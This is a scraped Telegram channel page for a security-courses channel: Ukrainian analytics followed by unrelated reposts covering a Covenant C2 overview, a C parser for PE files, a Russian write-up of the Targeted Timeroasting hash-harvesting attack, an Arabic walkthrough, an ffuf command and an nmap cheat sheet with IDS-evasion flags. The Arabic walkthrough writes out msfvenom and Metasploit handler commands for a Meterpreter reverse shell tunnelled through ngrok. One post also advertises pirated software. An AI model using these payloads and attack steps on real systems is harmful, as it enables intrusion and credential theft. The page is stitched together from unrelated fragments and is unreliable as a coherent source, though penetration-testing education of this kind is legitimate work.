Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
All Security Engineering Courses
Відкрити в Telegram
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
Показати більше📈 Аналітичний огляд Telegram-каналу All Security Engineering Courses
Канал All Security Engineering Courses (@allsecurityengineeringcourses) у мовному сегменті Англійська є активним учасником. На даний момент спільнота об'єднує 18 795 підписників, посідаючи 7 164 місце в категорії Технології та додатки та 35 971 місце у регіоні Росія.
📊 Показники аудиторії та динаміка
З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 18 795 підписників.
За останніми даними від 14 червня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 122, а за останні 24 години на 3, загальне охоплення залишається високим.
- Статус верифікації: Не верифікований
- Рівень залученості (ER): Середній показник залученості аудиторії становить 10.56%. Протягом перших 24 годин після публікації контент зазвичай збирає 3.00% реакцій від загальної кількості підписників.
- Охоплення публікацій: В середньому кожен допис отримує 1 985 переглядів. Протягом першої доби публікація в середньому набирає 563 переглядів.
- Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 2.
- Тематичні інтереси: Контент зосереджений навколо ключових тем, таких як git, strace, github, linux, docker.
📝 Опис та контентна політика
Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”
Завдяки високій частоті оновлень (останні дані отримано 15 червня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.
18 795
Підписники
+324 години
+387 днів
+12230 день
Архів дописів
An Indicator of Compromise (IoC) is digital evidence that a
cyber incident has occurred. An Indicator of Attack (IOA) is
digital or physical evidence that a cyberattack is likely to
occur.
IoC is static, IoA is dynamic.
System Requirements and Technical Details
- Supported OS: Windows 11 / Windows 10 / Windows 8.1 / Windows 7
- Processor: Multicore Intel Series or above, Xeon or AMD equivalent
- RAM: 4GB (8GB or more recommended)
- Free Hard Disk Space: 4GB or more recommended
~ Release Date - January 15, 2025
~ License type - full_version (except AI tools and other server-side fetures)
Support us with this referral and also this referral. Your support are much appreciatedShare & Support us. ! @filmora_10
Covenant C2 is a .NET-based command and control (C2) framework designed for red team operations and post-exploitation tasks. Developed by Ryan Cobb, it aims to highlight vulnerabilities within .NET environments and facilitate the use of offensive .NET tradecraft. Here are some key aspects of Covenant C2:
Cross-Platform Compatibility: Built with ASP.NET Core, Covenant can run on Windows, Linux, and macOS. It also supports Docker for containerized deployments
github
github
.
Web-Based Interface: Covenant features a web-based interface that supports multi-user collaboration, allowing multiple team members to operate simultaneously and coordinate their efforts effectively
github
snaplabs
.
Listeners and Grunts:
Listeners: These handle incoming connections from compromised systems (referred to as Grunts). Listeners can be configured for HTTP, HTTPS, and other protocols
snaplabs
unclesp1d3r.github
.
Grunts: These are the agents installed on target machines to execute commands and tasks as directed by the Covenant server. Grunts communicate back to the Covenant server via the listeners
unclesp1d3r.github
.
Dynamic Compilation and Obfuscation: Covenant uses the Roslyn API for dynamic C# compilation, which allows for the creation of obfuscated and dynamically compiled payloads, reducing the likelihood of detection
github
.
API and Extensibility: The framework is driven by an API, which facilitates customization and integration with other tools. It also includes a Swagger UI to simplify development and debugging
github
.
Tasks and Modules: Covenant includes pre-built tasks and modules that can be executed by Grunt agents. These tasks cover a wide range of post-exploitation activities, such as credential dumping, lateral movement, and data exfiltration
unclesp1d3r.github
.
For more detailed information on installation, configuration, and usage, you can visit the official GitHub repository
github
github
snaplabs
unclesp1d3r.github
.
Features Covered:
File Parsing: Reads the file into memory.
DOS Header Validation: Checks for MZ signature.
Rich Header: Demonstrates placeholder for decoding.
NT Headers: Validates PE signature and prints information.
Section Headers: Iterates and prints section details.
Next Steps:
Implement full decoding for the Rich Header.
Parse Import Data Directory and Base Relocation Table.
Enhance error handling for edge cases (e.g., truncated files).
Modularize the code for better readability and testing.
Let me know if you'd like to delve deeper into specific parts!
// Entry point
int main(int argc, char **argv) {
if (argc != 2) {
fprintf(stderr, "Usage: %s \n", argv[0]);
return EXIT_FAILURE;
}
uint8_t *buffer = NULL;
size_t size = read_file(argv[1], &buffer);
if (!size) {
return EXIT_FAILURE;
}
IMAGE_DOS_HEADER dos_header;
if (!parse_dos_header(buffer, &dos_header)) {
free(buffer);
return EXIT_FAILURE;
}
parse_rich_header(buffer);
if (!parse_nt_headers(buffer, &dos_header)) {
free(buffer);
return EXIT_FAILURE;
}
parse_section_headers(buffer, &dos_header);
free(buffer);
return EXIT_SUCCESS;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <windows.h>
// Define constants for Rich Header parsing
#define RICH_MAGIC 0x68636952 // "Rich"
// Utility function to read data from file
size_t read_file(const char *filename, uint8_t **buffer) {
FILE *file = fopen(filename, "rb");
if (!file) {
perror("Error opening file");
return 0;
}
fseek(file, 0, SEEK_END);
size_t size = ftell(file);
rewind(file);
*buffer = malloc(size);
if (!*buffer) {
perror("Memory allocation failed");
fclose(file);
return 0;
}
fread(*buffer, 1, size, file);
fclose(file);
return size;
}
// Parse and validate the DOS Header
int parse_dos_header(const uint8_t *data, IMAGE_DOS_HEADER *dos_header) {
memcpy(dos_header, data, sizeof(IMAGE_DOS_HEADER));
if (dos_header->e_magic != IMAGE_DOS_SIGNATURE) {
fprintf(stderr, "Invalid DOS magic value: 0x%X\n", dos_header->e_magic);
return 0;
}
printf("DOS Header:\n");
printf(" Magic: 0x%X\n", dos_header->e_magic);
printf(" Address of new exe header: 0x%X\n", dos_header->e_lfanew);
return 1;
}
// Parse and decode Rich Header (example, details depend on implementation)
void parse_rich_header(const uint8_t *data) {
printf("Rich Header:\n");
// Find the Rich signature and decode
const uint32_t *ptr = (const uint32_t *)(data + 0x80); // Approx start, adjust as needed
while (ptr[0] != RICH_MAGIC && ptr < (const uint32_t *)(data + 0x200)) {
ptr++;
}
if (ptr[0] == RICH_MAGIC) {
printf(" Rich Header found at offset 0x%X\n", (uint8_t *)ptr - data);
// Decrypt and display entries (requires XOR key parsing)
} else {
printf(" Rich Header not found\n");
}
}
// Parse NT Headers
int parse_nt_headers(const uint8_t *data, const IMAGE_DOS_HEADER *dos_header) {
const IMAGE_NT_HEADERS *nt_headers = (const IMAGE_NT_HEADERS *)(data + dos_header->e_lfanew);
if (nt_headers->Signature != IMAGE_NT_SIGNATURE) {
fprintf(stderr, "Invalid PE signature: 0x%X\n", nt_headers->Signature);
return 0;
}
printf("NT Headers:\n");
printf(" PE Signature: 0x%X\n", nt_headers->Signature);
printf(" File Header:\n");
printf(" Machine: 0x%X\n", nt_headers->FileHeader.Machine);
printf(" Number of Sections: %d\n", nt_headers->FileHeader.NumberOfSections);
printf(" Size of Optional Header: %d\n", nt_headers->FileHeader.SizeOfOptionalHeader);
const IMAGE_OPTIONAL_HEADER *opt_header = &nt_headers->OptionalHeader;
printf(" Optional Header:\n");
printf(" Magic: 0x%X\n", opt_header->Magic);
printf(" Address of Entry Point: 0x%X\n", opt_header->AddressOfEntryPoint);
printf(" Image Base: 0x%llX\n", (uint64_t)opt_header->ImageBase);
printf(" Section Alignment: 0x%X\n", opt_header->SectionAlignment);
printf(" File Alignment: 0x%X\n", opt_header->FileAlignment);
return 1;
}
// Parse Section Headers
void parse_section_headers(const uint8_t *data, const IMAGE_DOS_HEADER *dos_header) {
const IMAGE_NT_HEADERS *nt_headers = (const IMAGE_NT_HEADERS *)(data + dos_header->e_lfanew);
const IMAGE_SECTION_HEADER *section_headers = (const IMAGE_SECTION_HEADER *)(
(const uint8_t *)&nt_headers->OptionalHeader + nt_headers->FileHeader.SizeOfOptionalHeader);
printf("Section Headers:\n");
for (int i = 0; i < nt_headers->FileHeader.NumberOfSections; i++) {
printf(" Section %d: %s\n", i + 1, section_headers[i].Name);
printf(" Virtual Address: 0x%X\n", section_headers[i].VirtualAddress);
printf(" Virtual Size: 0x%X\n", section_headers[i].Misc.VirtualSize);
printf(" Raw Data Pointer: 0x%X\n", section_headers[i].PointerToRawData);
printf(" Raw Data Size: 0x%X\n", section_headers[i].SizeOfRawData);
}
}
Below is a skeleton implementation for a PE file parser in C that achieves the outlined functionality. Note that building such a parser requires an understanding of the Portable Executable (PE) format, structures defined in the Windows API, and binary file manipulation. For simplicity, this code will primarily focus on the parsing flow and use key PE structures from the Windows header files. Additional effort will be needed to handle error cases robustly.
Repost from RedTeam brazzers
Сегодня я увидел в нескольких каналах информацию про атаку Targeted Timeroasting и очень вдохновился ею.
В двух словах, что такое атака Timeroasting - Это атака, позволяющая получить хеш пароля машинной учетной записи. В целом, мы знаем, что это для нас бесполезно, т.к. пароль машины чаще всего очень длинный и сложный. Но есть сценарии, когда пароль все таки бывает простой и, в совокупности с атакой pre2k, можно построить интересный вектор. Об этом в своем блоге недавно писал @snovvcrash.
Суть атаки Targeted Timeroasting немного в другом: если у нас есть права GenericWrite на объект пользователя, то мы можем превратить этого пользователя в компьютер (что?) и запросить хеш для него. Превратить пользователя в компьютер можно двумя простыми шагами:
1. Меняем userAccountControl на 4096 (UF_WORKSTATION_TRUST_ACCOUNT)
2. Переименовываем sAMAccountName в тоже имя, но со знаком $ на конце
После этих действий сервис времени будет уверен, что это теперь компьютер и отдаст вам хеш.
Хорошо, как можно это использовать?
1 Сценарий.
У нас есть права Domain Admins и не хочется шуметь с помощью атаки DcSync, тогда можно запустить Targeted Timeroasting на всех пользователей и вы получите хеши учеток, которые потом надо будет еще сбрутать.
2 Сценарий.
Захватили учетку HelpDesk. Чаще всего у этой учетки есть права GenericWrite на половину домена. CA в домене нет, значит не провести атаку Shadow Creds. Проведя атаки Targeted Kerberoasting или Targeted AsReproasting мы получим билеты, которые нет возможности побрутить по большим словарям. А с помощью атаки Targeted Timeroasting мы, во-первых, не сильно нашумим на SIEM (не факт, конечно), а во-вторых, получим хеши, которые можно перебирать с чудовещной скоростью.
Остальные сценарии придумайте сами :)
Свежий ресерч про эту атаку вы можете прочитать в блоге. Брутить хеши на hashcat можно так:
git clone https://github.com/hashcat/hashcat && cd hashcat
git checkout 5236f3bd7 && make
./hashcat -m31300Repost from 🛡️الدرع الأخضر | GREEN ARMOR🛡️
🛡 ما هي اداة Ngrok وكيف يتم إختبار إختراق نظام ويندوز بواسطتها 🧑💻..
هي أداة قوية في اختبار الاختراق وتحليل الشبكات، حيث تسمح لك بإنشاء tunnel (نفق) إلى جهازك المحلي، مما يتيح لك الوصول إلى خدمات وبروتوكولات تشغيلية على جهاز الكمبيوتر الخاص بك من خلال عنوان URL عندما تحتاج لإختبار الإختراق على نظام معين.
✅ كيفية استخدام ngrok مع Metasploit:
سأوضح لك كيفية استخدام ngrok مع Metasploit payload لاختبار اختراق أنظمة ويندوز، على توزيعة Kali Linux:
1️⃣ تثبيت ngrok:
يمكنك تحميل ngrok من موقعه الرسمي:
wget https://bin.equinox.io/c/111/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
sudo mv ngrok /usr/local/binngrok http 8080http://abcd1234.ngrok.io) يمكنك استخدامه مع الـ payload.
3️⃣ إعداد Metasploit Payload:
✅ كيف يمكنك إنشاء payload:
🟢 افتح Metasploit عن طريق استخدام الأمر التالي في Terminal:
msfconsole
msfvenom لإنشاء payload، لنفترض أنك تريد إنشاء ملف تنفيذي لحزمة ويندوز:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=abcd1234.ngrok.io LPORT=8080 -f exe -o payload.exe
abcd1234.ngrok.io بعنوان ngrok الخاص بك.
4️⃣ إعداد Metasploit Listener:
بعد إنشاء الـ payload، قم بإعداد listener في Metasploit:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST abcd1234.ngrok.io
set LPORT 8080
exploitpayload.exe إلى النظام المستهدف وقم بتشغيله، إذا تم كل شيء بشكل صحيح، يجب أن تتصل بك Meterpreter على Kali Linux.
⚠️ ملاحظة/ عليك الإمتثال لجميع القوانين والأخلاقيات المرتبطة بإختبار الاختراق.
🛡 ابدأوا الأن عبر منصة أكاديمية الدرع الأخضر: https://greenarmor.academy
Repost from ExploitQuest
ffuf -u http://target.com/FUZZ -w wordlist.txt -e .json,.xml,.bak,.sql,.zip,.log,.config,.env -c -t 50 -recursion -recursion-depth 2 -s -mc 200,301,302 -o results.jsonRepost from Suboxone Hackers chat room 😳💬💬💬
💥 NMAP CHEAT SHEET
#1 Nmap Basic Scanning
nmap -sV [host] // Version Detection, default scan
nmap -sS [host] // SYN Stealth Scan
nmap -sU [host] // UDP Scan
nmap -sT [host] // TCP Connect() Scan
nmap -sN [host] // TCP Null Scan
nmap -sF [host] // TCP FIN Scan
#2 Nmap Host Discovery
nmap -sL [host/network] // List Scan - Discover targets by querying DNS or the targets in a network
nmap -sn [host/network] // Ping Scan - Determine if hosts are alive
nmap -Pn [host/network] // Skip host discovery
#3 Nmap Port Scanning
nmap -sC [host] // Script Scan - Execute default nmap scripts
nmap -p [ports] [host] // Scan specific ports
nmap -F [host] // Fast Scan - Scan for the most commonly used ports
#4 Nmap Advertising Scanning
nmap -oA [filename] [host] // Output scan in all formats
nmap -O [host] // Probe Operating System fingerprints
nmap [host] --traceroute // Trace host hops
#5 Nmap Version Detection
nmap -sV [host] // Show versions of services and OS
nmap -A [host] // Advanced Scan - OS and service version and script scanning
nmap --script [name] [host] // Execute a custom script
#6 Nmap Timing Options
nmap -T[0-5] [host] // Timing for scans
#7 Nmap Firewall/IDS Evasion
nmap --spoof-mac [address] // Changes source MAC address
nmap -D RND:10 [host] // Decoy Scan - Appear to scan from multiple hosts
nmap -f // Fragmented Packets - Fragment Packets
nmap -Pn [host] // Skip host discovery
nmap --data-length [length] // Append random data to packet
💥Thank you 🙏
🥸 Give Reactions 🙌
Join our groups for more Hacking
👹Join Telegram Group:-
https://t.me/SuBoXoneSoCiety
👿Join Whatsapp community group:https://whatsapp.com/channel/0029VaGX1X47T8bP63aZhb22
